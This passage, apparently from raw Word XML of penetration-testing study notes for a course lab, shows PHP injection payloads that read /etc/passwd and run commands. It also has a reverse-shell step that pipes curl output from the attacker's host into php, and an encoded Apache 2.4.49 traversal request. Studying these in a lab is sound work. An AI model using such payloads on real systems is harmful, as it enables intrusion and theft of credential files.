          <w:t xml:space="preserve">source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and more specifically, the walkthrough) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and execute commands using this. Here are some examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' and die(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show_source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">('/etc/passwd')) or '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CBD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show_source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function is like "cat", so it's used to read files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' and die(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">("whoami")) or '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="870"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "system" function is used to execute commands</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So to get a reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start a listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host a reverse shell on your local machine via Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put this in the LFI (replace IP first): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' and die(system("curl http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.49.119:8000/shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | php")) or '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The syntax "| php" pipes the curl to PHP, so the PHP interpreter will run the curl command, activating the reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n5qhz5b4ix3b" w:id="238"/>
      <w:bookmarkEnd w:id="238"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_egm9gxdaxyi8" w:id="239"/>
      <w:bookmarkEnd w:id="239"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encoding Special Characters (and Apache httpd 2.4.49 exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack (as taught in XXXXXXXXX section below) was used on .245 in Relia Challenge Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, in the reading they didn't teach us to use the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--path-as-is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag which was necessary for me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl --path-as-is "http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.158.245</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1207"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Always include the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1207"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's important to use curl and not firefox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --path-as-is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1CD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The --path-as-is flag tells curl not to normalize or decode the URL path before sending.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will not get decoded to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1363"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is important since in the Relia, the ../ were getting blocked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the XXXXXXXXX 9.1.3. Encoding Special Characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Having honed our understanding of directory traversal concepts using the "Mountain Desserts" web application, let's try applying these skills to a real vulnerability. In the "Vulnerability Scanning" topic, we scanned the SAMBA machine and identified a directory traversal vulnerability in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache 2.4.49.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This vulnerability can be exploited by using a relative path after specifying the cgi-bin directory in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use curl and multiple ../ sequences to try exploiting this directory traversal vulnerability in Apache 2.4.49 on the WEB18 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CDE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3860800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="169" name="image168.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image168.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56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1CDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE0">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 11 demonstrates that after attempting two queries with a different number of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we could not display the contents of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via directory traversal. Because leveraging </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a known way to abuse web application behavior, this sequence is often filtered by either the web server,</w:t>
      </w:r>
      <w:hyperlink r:id="rId570">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId571">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">web application firewalls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, or the web application itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fortunately for us, we can use</w:t>
      </w:r>
      <w:hyperlink r:id="rId572">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId573">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URL Encoding</w:t>
        </w:r>
      </w:hyperlink>
